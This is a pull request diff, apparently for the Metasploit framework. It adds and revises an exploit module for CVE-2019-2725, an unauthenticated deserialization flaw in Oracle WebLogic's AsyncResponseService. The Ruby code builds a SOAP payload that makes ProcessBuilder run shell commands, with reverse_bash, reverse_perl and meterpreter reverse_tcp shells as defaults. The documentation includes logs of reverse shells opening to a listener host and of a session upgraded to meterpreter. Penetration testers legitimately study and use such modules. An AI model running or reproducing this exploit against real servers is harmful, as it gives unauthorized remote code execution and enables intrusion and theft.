### PR TITLE
Add Weblogic deserialize AsyncResponseService module

### DIFF
--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md
@@ -1,0 +1,233 @@
+## Vulnerable Application
+
+
+CVE-2019-2725 (aka CNVD-C 2019-48814) exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.  The exploit provides an unauthenticated attacker with remote arbitrary command execution.
+
+Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.  It is downloadable from Oracle once registered for an account.  For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`), Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).  For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`) in combination with a JDK (`jdk-8u211-windows-x64.exe`).
+
+## Verification Steps
+
+#### Install the application
+  1. Install the application using the binaries above, with both a WebLogic server and an admin server.
+  2. When prompted, name the project `base_domain`.
+  3. When prompted, use a development environment instead of a production environment.
+  4. When prompted, keep the default port of TCP/7001.
+  5. When prompted, provide a username and password, and make a note of them.
+  6. Upon completion of the installer, find and execute the admin server.  On Windows: `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
+  7. You may be prompted for the username and password you generated during the install process.
+  8. Wait for the output: `<Server state changed to RUNNING.>`
+
+#### Checking for the vulnerability
+  1. Start msfconsole
+  2. `use exploit/multi/misc/weblogic_deserialize_asyncresponseservice`
+  3. Configure RHOSTS to the target address, and set RPORT if the default port is not being used.
+  4. Run the `check` method to confirm exploitability.
+  5. Look for one of the following two outputs:
+```
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
+[+] 192.168.199.191:7001 - The target is vulnerable.
+```
+
+```
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
+[*] 192.168.199.152:7001 - The target is not exploitable.
+```
+
+#### Exploiting the vulnerability
+  1. Follow the steps in the previous "checking" section.
+  2. Set the operating system of the target (eg. `set TARGET Windows`)
+  3. Configure the payload and payload parameters.
+  4. `run`
+
+## Options
+
+  **WSPATH**
+
+`WSPATH` points to the `AsyncResponseService` endpoint which is exploited by this module.  A default value has been set and should not need to be changed.
+
+  **URIPATH**
+  
+`URIPATH` is the URI (eg. `http://192.168.192.132`) used for the HTTP request.  In most cases, this value can be left blank and will be substituted with the IP address from RHOSTS.  Potential uses of this option include if the host is behind network translation or requires a hostname to handle virtual hosts.
+
+## Scenarios
+
+#### Version 10.3.6 on Ubuntu Linux
+
+```
+msf5 post(multi/manage/shell_to_meterpreter) > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
+[+] 192.168.199.191:7001 - The target is vulnerable.
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > options
+
+Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):
+
+   Name     Current Setting               Required  Description
+   ----     ---------------               --------  -----------
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.199.191               yes       The target address range or CIDR identifier
+   RPORT    7001                          yes       The target port (TCP)
+   SSL      false                         no        Negotiate SSL/TLS for outgoing connections
+   URIPATH                                no        URL to the weblogic instance (leave blank to substitute RHOSTS)
+   VHOST                                  no        HTTP server virtual host
+   WSPATH   /_async/AsyncResponseService  yes       URL to AsyncResponseService
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.199.148  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix
+
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run
+
+[*] Started reverse TCP handler on 192.168.199.148:4444 
+[*] Generating payload...
+[*] Sending payload...
+[*] Command shell session 1 opened (192.168.199.148:4444 -> 192.168.199.191:43532) at 2019-05-06 12:31:29 -0500
+
+id
+uid=1000(administrator) gid=1000(administrator) groups=1000(administrator),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),116(lxd)
+background
+
+Background session 2? [y/N]  y
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > use post/multi/manage/shell_to_meterpreter
+msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
+SESSION => 2
+msf5 post(multi/manage/shell_to_meterpreter) > run
+
+[*] Upgrading session ID: 1
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 192.168.199.148:4433 
+
+[*] Sending stage (985320 bytes) to 192.168.199.191
+[*] Meterpreter session 2 opened (192.168.199.148:4433 -> 192.168.199.191:55522) at 2019-05-06 12:30:45 -0500
+
+[*] Command stager progress: 100.00% (773/773 bytes)
+[*] Post module execution completed
+msf5 post(multi/manage/shell_to_meterpreter) > 
+msf5 post(multi/manage/shell_to_meterpreter) > 
+msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: uid=1000, gid=1000, euid=1000, egid=1000
+meterpreter > sysinfo
+Computer     : 192.168.199.191
+OS           : Ubuntu 16.04 (Linux 4.4.0-146-generic)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > exit
+```
+
+#### Version 10.3.6 on Windows 10
+
+```
+msf5 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOSTS 192.168.199.152
+RHOSTS => 192.168.199.152
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
+[+] 192.168.199.152:7001 - The target is vulnerable.
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.199.148 
+LHOST => 192.168.199.148
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set TARGET Windows
+TARGET => Windows
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > options
+
+Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):
+
+   Name     Current Setting               Required  Description
+   ----     ---------------               --------  -----------
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.199.152               yes       The target address range or CIDR identifier
+   RPORT    7001                          yes       The target port (TCP)
+   SSL      false                         no        Negotiate SSL/TLS for outgoing connections
+   URIPATH                                no        URL to the weblogic instance (leave blank to substitute RHOSTS)
+   VHOST                                  no        HTTP server virtual host
+   WSPATH   /_async/AsyncResponseService  yes       URL to AsyncResponseService
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.199.148  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows
+
+
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run
+
+[*] Started reverse TCP handler on 192.168.199.148:4444 
+[*] Generating payload...
+[*] Sending payload...
+[*] Sending stage (179779 bytes) to 192.168.199.152
+[*] Meterpreter session 1 opened (192.168.199.148:4444 -> 192.168.199.152:49764) at 2019-05-06 13:46:18 -0500
+
+meterpreter > 
+```
+
+#### Version 12.2.1.2 on Windows 10 (non-exploitable)
+
+```
+msf5 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOSTS 192.168.199.152
+RHOSTS => 192.168.199.152
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.199.148 
+LHOST => 192.168.199.148
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set TARGET Windows
+TARGET => Windows
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > options
+
+Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):
+
+   Name     Current Setting               Required  Description
+   ----     ---------------               --------  -----------
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.199.152               yes       The target address range or CIDR identifier
+   RPORT    7001                          yes       The target port (TCP)
+   SSL      false                         no        Negotiate SSL/TLS for outgoing connections
+   URIPATH                                no        URL to the weblogic instance (leave blank to substitute RHOSTS)
+   VHOST                                  no        HTTP server virtual host
+   WSPATH   /_async/AsyncResponseService  yes       URL to AsyncResponseService
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.199.148  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows
+
+
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run
+
+[*] Started reverse TCP handler on 192.168.199.148:4444 
+[*] Generating payload...
+[*] Sending payload...
+[-] Exploit aborted due to failure: disconnected: The target forcibly closed the connection, and is likely not vulnerable.
+[*] Exploit completed, but no session was created.
+```

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
       'Description' => %q{
         An unauthenticated attacker with network access to the Oracle Weblogic Server T3
-        interface can send a malicious SOAP request to the interface WLS AsyncResponseService 
+        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
         to execute code on the vulnerable host.
       },
       'Author' =>
@@ -37,8 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
             'Platform' => 'unix',
             'Arch' => [ARCH_CMD],
             'DefaultOptions' => {
-	      'PAYLOAD' => 'cmd/unix/reverse_bash'
-	    }
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
           ],
           [ 'Windows',
             'Platform' => 'win',
@@ -77,10 +77,10 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
     )
   end
-  
+
   def send_payload
     uri = normalize_uri(datastore['WSPATH'])
-    
+
     print_status("Generating payload...")
     # payload creation
     if target.name == 'Windows'
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     random_action = rand_text_alphanumeric(20)
     random_relates = rand_text_alphanumeric(20)
-    
+
     print_status("[#{uri}] Sending payload...")
     soap_payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
     soap_payload <<  "  xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" "
@@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     soap_payload <<  "    <asy:onAsyncDelivery/> "
     soap_payload <<  "  </soapenv:Body> "
     soap_payload <<  "</soapenv:Envelope>"
-    
+
     print_status(shell_payload)
 
     res = send_request_cgi(
@@ -139,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'data'     => soap_payload,
       'headers'  => {'SOAPAction' => '' }
     )
-    
+
     if res and res.code != 202
       print_error("Failed to exploit the vulnerability on #{uri}")
       return

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -76,6 +76,38 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
     )
   end
+  
+  def create_soap_payload(xml_cmd, param_cmd, payload)
+    <<~EOF
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+                        xmlns:wsa="http://www.w3.org/2005/08/addressing"
+                        xmlns:asy="http://www.bea.com/async/AsyncResponseService">
+        <soapenv:Header>
+          <wsa:Action>#{rand_text_alphanumeric(20)}</wsa:Action>
+          <wsa:RelatesTo>#{rand_text_alphanumeric(20)}</wsa:RelatesTo>
+          <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+            <void class="java.lang.ProcessBuilder">
+              <array class="java.lang.String" length="3">
+                <void index="0">
+                  <string>#{xml_cmd}</string>
+                </void>
+                <void index="1">
+                  <string>#{param_cmd}</string>
+                </void>
+                <void index="2">
+                  <string>#{payload.encode(xml: :text)}</string>
+                </void>
+              </array>
+              <void method="start"/>
+            </void>
+          </work:WorkContext>
+        </soapenv:Header>
+        <soapenv:Body>
+          <asy:onAsyncDelivery/>
+        </soapenv:Body>
+      </soapenv:Envelope>
+    EOF
+  end
 
   def send_payload
     uri = normalize_uri(datastore['WSPATH'])
@@ -93,39 +125,8 @@ class MetasploitModule < Msf::Exploit::Remote
       shell_payload = payload.encoded
     end
 
-    random_action = rand_text_alphanumeric(20)
-    random_relates = rand_text_alphanumeric(20)
-
     print_status("[#{uri}] Sending payload...")
-    soap_payload = <<~EOF
-      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
-                        xmlns:wsa="http://www.w3.org/2005/08/addressing"
-                        xmlns:asy="http://www.bea.com/async/AsyncResponseService">
-        <soapenv:Header>
-          <wsa:Action>#{random_action}</wsa:Action>
-          <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>
-          <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-            <void class="java.lang.ProcessBuilder">
-              <array class="java.lang.String" length="3">
-                <void index="0">
-                  <string>#{xml_cmd}</string>
-                </void>
-                <void index="1">
-                  <string>#{param_cmd}</string>
-                </void>
-                <void index="2">
-                  <string>#{shell_payload.encode(xml: :text)}</string>
-                </void>
-              </array>
-              <void method="start"/>
-            </void>
-          </work:WorkContext>
-        </soapenv:Header>
-        <soapenv:Body>
-          <asy:onAsyncDelivery/>
-        </soapenv:Body>
-      </soapenv:Envelope>
-    EOF
+    soap_payload = create_soap_payload(xml_cmd, param_cmd, shell_payload)
 
     res = send_request_cgi(
       'uri'      => uri,

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -1,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
+      'Description' => %q{
+        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
+        interface can send a malicious SOAP request to the interface WLS AsyncResponseService 
+        to execute code on the vulnerable host.
+      },
+      'Author' =>
+        [
+        'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CNVD-C', '2019-48814'],
+          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999']
+        ],
+      'Privileged' => false,
+      'Platform' => %w{ unix win solaris },
+      'Targets' =>
+        [
+          [ 'Unix',
+            'Platform' => 'unix',
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+	      'PAYLOAD' => 'cmd/unix/reverse_bash'
+	    }
+          ],
+          [ 'Windows',
+            'Platform' => 'win',
+            'Payload' => {},
+	    'Arch' => [ARCH_X64, ARCH_X86],
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+          ],
+          [ 'Solaris',
+            'Platform' => 'solaris',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
+            'Payload' => {
+              'Space'       => 2048,
+              'DisableNops' => true,
+              'Compat'      =>
+                {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'generic perl telnet',
+                }
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 12
+        },
+      'DisclosureDate' => 'Apr 23 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(7001),
+	OptString.new('RHOSTS', [false]),
+        OptString.new('URIPATH', [true, 'URL to the weblogic instance', '']),
+        OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
+      ]
+    )
+  end
+  
+  def send_payload
+    uri = normalize_uri(datastore['WSPATH'])
+    
+    print_status("Generating payload...")
+    # payload creation
+    if target.name == 'Windows'
+      xml_cmd = "          <void index=\"0\"> "
+      xml_cmd <<  "            <string>cmd.exe</string> "
+      xml_cmd <<  "          </void> "
+      xml_cmd <<  "          <void index=\"1\"> "
+      xml_cmd <<  "            <string>/c</string> "
+      xml_cmd <<  "          </void> "
+      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
+    elsif target.name == 'Unix' || target.name == 'Solaris'
+      xml_cmd =  "          <void index=\"0\"> "
+      xml_cmd <<  "            <string>/bin/bash</string> "
+      xml_cmd <<  "          </void> "
+      xml_cmd <<  "          <void index=\"1\"> "
+      xml_cmd <<  "            <string>-c</string> "
+      xml_cmd <<  "          </void> "
+      shell_payload = payload.encoded
+    end
+
+    random_action = rand_text_alphanumeric(20)
+    random_relates = rand_text_alphanumeric(20)
+    
+    print_status("[#{uri}] Sending payload...")
+    soap_payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
+    soap_payload <<  "  xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" "
+    soap_payload <<  "  xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"> "
+    soap_payload <<  "  <soapenv:Header> "
+    soap_payload <<  "    <wsa:Action>#{random_action}</wsa:Action> "
+    soap_payload <<  "    <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> "
+    soap_payload <<  "    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> "
+    soap_payload <<  "      <void class=\"java.lang.ProcessBuilder\"> "
+    soap_payload <<  "        <array class=\"java.lang.String\" length=\"3\"> "
+
+    soap_payload <<  xml_cmd # SO cli
+
+    soap_payload <<  "          <void index=\"2\"> "
+    soap_payload <<  "            <string>#{xml_encode(shell_payload)}</string> "
+    soap_payload <<  "          </void> "
+    soap_payload <<  "        </array> "
+    soap_payload <<  "        <void method=\"start\"/> "
+    soap_payload <<  "      </void> "
+    soap_payload <<  "    </work:WorkContext> "
+    soap_payload <<  "  </soapenv:Header> "
+    soap_payload <<  "  <soapenv:Body> "
+    soap_payload <<  "    <asy:onAsyncDelivery/> "
+    soap_payload <<  "  </soapenv:Body> "
+    soap_payload <<  "</soapenv:Envelope>"
+    
+    print_status(shell_payload)
+
+    res = send_request_cgi(
+      'uri'      => uri, #datastore['URIPATH'] + uri,
+      'method'   => 'POST',
+      'ctype'    => 'text/xml',
+      'data'     => soap_payload,
+      'headers'  => {'SOAPAction' => '' }
+    )
+    
+    if res and res.code != 202
+      print_error("Failed to exploit the vulnerability on #{uri}")
+      return
+    end
+  end
+
+  def xml_encode(str)
+    ret = ""
+    str.unpack('C*').each { |ch|
+      case ch
+      when 0x41..0x5a, 0x61..0x7a, 0x30..0x39
+        ret << ch.chr
+      else
+        ret << "&#x"
+        ret << ch.chr.unpack('H*')[0]
+        ret << ";"
+      end
+    }
+    ret
+  end
+
+  def exploit
+
+    send_payload
+
+    #handler
+  end
+end

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -14,12 +14,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
       'Description' => %q{
         An unauthenticated attacker with network access to the Oracle Weblogic Server T3
-        can send a malicious SOAP request to the WLS AsyncResponseService interface
+        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
         to execute code on the vulnerable host.
       },
       'Author' =>
         [
-          'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
+        'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>',  # Metasploit Module
         ],
       'License' => MSF_LICENSE,
       'References' =>
@@ -35,10 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'Unix',
             'Platform' => 'unix',
-            'Arch' => [ARCH_CMD],
-            'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/unix/reverse_bash'
-            }
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
           ],
           [ 'Windows',
             'Platform' => 'win',
@@ -50,6 +48,8 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_CMD,
             'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
             'Payload' => {
+              'Space'       => 2048,
+              'DisableNops' => true,
               'Compat'      =>
                 {
                   'PayloadType' => 'cmd',
@@ -59,83 +59,114 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
       'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 12
+        },
       'DisclosureDate' => 'Apr 23 2019'))
 
     register_options(
       [
         Opt::RPORT(7001),
-        OptString.new('URIPATH', [true, 'URL to the weblogic instance', '']),
+        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
         OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
       ]
     )
   end
 
-  def create_soap_payload(xml_cmd, param_cmd, payload)
-    <<~EOF
-      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
-                        xmlns:wsa="http://www.w3.org/2005/08/addressing"
-                        xmlns:asy="http://www.bea.com/async/AsyncResponseService">
-        <soapenv:Header>
-          <wsa:Action>#{rand_text_alphanumeric(20)}</wsa:Action>
-          <wsa:RelatesTo>#{rand_text_alphanumeric(20)}</wsa:RelatesTo>
-          <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-            <void class="java.lang.ProcessBuilder">
-              <array class="java.lang.String" length="3">
-                <void index="0">
-                  <string>#{xml_cmd}</string>
-                </void>
-                <void index="1">
-                  <string>#{param_cmd}</string>
-                </void>
-                <void index="2">
-                  <string>#{payload.encode(xml: :text)}</string>
-                </void>
-              </array>
-              <void method="start"/>
-            </void>
-          </work:WorkContext>
-        </soapenv:Header>
-        <soapenv:Body>
-          <asy:onAsyncDelivery/>
-        </soapenv:Body>
-      </soapenv:Envelope>
-    EOF
-  end
-
-  def send_payload
-    uri = normalize_uri(datastore['WSPATH'])
-
-    print_status("Generating payload...")
-    # payload creation
-    case target.name
-    when 'Windows'
-      xml_cmd = "cmd.exe"
-      param_cmd = "/c"
-      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
-    when 'Unix', 'Solaris'
-      xml_cmd = "/bin/bash"
-      param_cmd = "-c"
-      shell_payload = payload.encoded
-    end
-
-    print_status("[#{uri}] Sending payload...")
-    soap_payload = create_soap_payload(xml_cmd, param_cmd, shell_payload)
-
+  def check
     res = send_request_cgi(
-      'uri'      => uri,
+      'uri'      => normalize_uri(datastore['WSPATH']),
       'method'   => 'POST',
       'ctype'    => 'text/xml',
-      'data'     => soap_payload,
       'headers'  => {'SOAPAction' => '' }
     )
 
-    if res && res.code != 202
-      print_error("Failed to exploit the vulnerability on #{uri}")
-      return
+    if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
+      vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
+      vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
+      Exploit::CheckCode::Vulnerable
+    elsif res && res.code != 202
+      vprint_status("The target returned a non-vulnerable HTTP code")
+      Exploit::CheckCode::Safe
+    elsif res.nil?
+      vprint_status("The target did not respond in an expected way")
+      Exploit::CheckCode::Unknown
+    else
+      vprint_status("The target returned HTTP code: #{res.code}")
+      vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
+      Exploit::CheckCode::Unknown
     end
   end
 
   def exploit
-    send_payload
+    print_status("Generating payload...")
+    case target.name
+    when 'Windows'
+      string0_cmd = 'cmd.exe'
+      string1_param = '/c'
+      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
+    when 'Unix','Solaris'
+      string0_cmd = '/bin/bash'
+      string1_param = '-c'
+      shell_payload = payload.encoded
+    end
+
+    random_action = rand_text_alphanumeric(20)
+    random_relates = rand_text_alphanumeric(20)
+
+    soap_payload =  %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
+    soap_payload <<   %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
+    soap_payload <<   %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
+    soap_payload <<   %Q|<soapenv:Header>|
+    soap_payload <<     %Q|<wsa:Action>#{random_action}</wsa:Action>|
+    soap_payload <<     %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
+    soap_payload <<     %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
+    soap_payload <<       %Q|<void class="java.lang.ProcessBuilder">|
+    soap_payload <<         %Q|<array class="java.lang.String" length="3">|
+    soap_payload <<           %Q|<void index="0">|
+    soap_payload <<             %Q|<string>#{string0_cmd}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<           %Q|<void index="1">|
+    soap_payload <<             %Q|<string>#{string1_param}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<           %Q|<void index="2">|
+    soap_payload <<             %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
+   #soap_payload <<             %Q|<string>#{xml_encode(shell_payload)}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<         %Q|</array>|
+    soap_payload <<       %Q|<void method="start"/>|
+    soap_payload <<       %Q|</void>|
+    soap_payload <<     %Q|</work:WorkContext>|
+    soap_payload <<   %Q|</soapenv:Header>|
+    soap_payload <<   %Q|<soapenv:Body>|
+    soap_payload <<     %Q|<asy:onAsyncDelivery/>|
+    soap_payload <<   %Q|</soapenv:Body>|
+    soap_payload << %Q|</soapenv:Envelope>|
+
+    uri = normalize_uri(datastore['WSPATH'])
+    if uri.nil?
+      datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
+    end
+
+    print_status("Sending payload...")
+
+    begin
+      res = send_request_cgi(
+        'uri'      => uri,
+        'method'   => 'POST',
+        'ctype'    => 'text/xml',
+        'data'     => soap_payload,
+        'headers'  => {'SOAPAction' => '' }
+      )
+    rescue Errno::ENOTCONN
+      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
+    end
+
+    if res.nil?
+      fail_with(Failure::Unreachable, "No response from host")
+    elsif res && res.code != 202
+      fail_with(Failure::UnexpectedReply,"Exploit failed.  Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
+    end
   end
 end

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     soap_payload <<  '  xmlns:asy="http://www.bea.com/async/AsyncResponseService"> '
     soap_payload <<  '  <soapenv:Header> '
     soap_payload <<  "    <wsa:Action>#{random_action}</wsa:Action> "
-    soap_payload <<  '    <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> '
+    soap_payload <<  "    <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> "
     soap_payload <<  '    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> '
     soap_payload <<  '      <void class="java.lang.ProcessBuilder"> '
     soap_payload <<  '        <array class="java.lang.String" length="3"> '

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -19,14 +19,15 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author' =>
         [
-        'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
+          'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
         ],
       'License' => MSF_LICENSE,
       'References' =>
         [
           ['CVE', '2019-2725'],
           ['CNVD-C', '2019-48814'],
-          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999']
+          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
+          ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
         ],
       'Privileged' => false,
       'Platform' => %w{ unix win solaris },
@@ -97,32 +98,32 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("[#{uri}] Sending payload...")
     soap_payload = <<~EOF
-      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
-                        xmlns:wsa="http://www.w3.org/2005/08/addressing" 
-                        xmlns:asy="http://www.bea.com/async/AsyncResponseService"> 
-        <soapenv:Header> 
-          <wsa:Action>#{random_action}</wsa:Action> 
-          <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> 
-          <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
